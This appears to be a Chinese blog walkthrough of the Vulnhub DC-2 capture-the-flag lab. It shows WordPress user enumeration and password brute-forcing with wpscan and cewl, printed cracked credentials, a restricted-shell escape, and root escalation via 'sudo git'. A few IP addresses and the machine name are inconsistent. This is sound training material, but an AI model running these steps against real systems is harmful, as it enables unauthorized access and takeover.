Vulnhub靶机实战——DC-2

Vulnhub靶机实战——DC-2

描述:靶机DC-2共有5个flag,最终需要root权限才可以找到并查看flag

环境:Vmware虚拟机软件

DC-1靶机IP地址:192.168.1.146

kali的IP地址:192.168.1.148

1.查看ip

nmap -sP 192.168.1.0/24    查看ip
nmap -A 192.168.1.146     #这里我的靶机IP是146

 

 

2.浏览器访问http://192.168.220.146,发现无法正常访问页面,但在url地址栏会有http://dc-2域名提示,发现问题是本地无法解析域名dc-2

 

 

3.编辑/etc/hosts文件,添加靶机IP地址及对应域名:192.168.220.146 dc-2

vim /etc/hosts
192.168.1.146 dc-2

 

 

4.添加域名解析后,可以正常访问网页信息,并能在Flag页面找到flag1

提示使用cewl密码字典生成工具,并且在登录后可以找到下一个flag

 

 

 

 

5.flag1提示可以登录,但正常访问网页无法找到登录页面,所以使用nikto工具扫描网站结构,找到wp-login.php登录页面

nikto -h dc-2 -o nikto-dc2.txt
cat dc-2.nikto

 

 

 

 

6.访问登录页面:http://dc-2/wp-login.php

 

 

7.使用wpscan工具扫描网站,获取可以登录网站的用户名,扫描后可以找到三个用户名:admin、tom、jerry

wpscan --url dc-2 -e u

 

 

 

 

8.将扫描到的三个用户名添加到dc-2users.list

vim dc-2users.list
admin
tom
jerry

 

 

 

 

9.使用flag1中提示的工具cewl生成密码字典dc-2.dic

cewl dc-2 -w dc-2.dic
cat dc-2.dic

 

 

10.使用wpscan工具爆破可以登录用户的密码,可成功爆破tom和jerry用户,密码为:

jerry / adipiscing

tom / parturient

wpscan --url dc-2 -U dc-2users.list -P dc-2.dic

 

 

 

 

11.用ssh对其中一个进行连接,输入密码

ssh tom@192.168.1.146 -p 7744

 

 

 

BASH_CMDS[a]=/bin/sh;a  #调用/bin/sh命令解释器
export PATH=$PATH:/bin/ #使用bash命令解释器
export PATH=$PATH:/usr/bin #设置环境变量

 

 

找到flag3

切换到Jerry用户找到flag4

 

 

flag4 提示我们可以使用git,我们可以通过git来提权


sudo -l #查看可以使用root权限无密码的命令,有git命令
sudo git -p help #提权

 

 

然后弹出一堆东西最后是个冒号,我们在冒号后面输入

! /bin/bash

 

 

然后就到了root用户再输入id ,whoami查看自己的成果!

 

 

whoami   #查看当前用户
passwd root #修改root密码
123456 #密码修改为:123456
su root #切换到root用户
cd /root #进入到root家目录下
ls #找到final-flag.txt

 

 

找到5个flag文件,并提权成功!

posted @   风潆月  阅读(320)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY
点击右上角即可分享
微信分享提示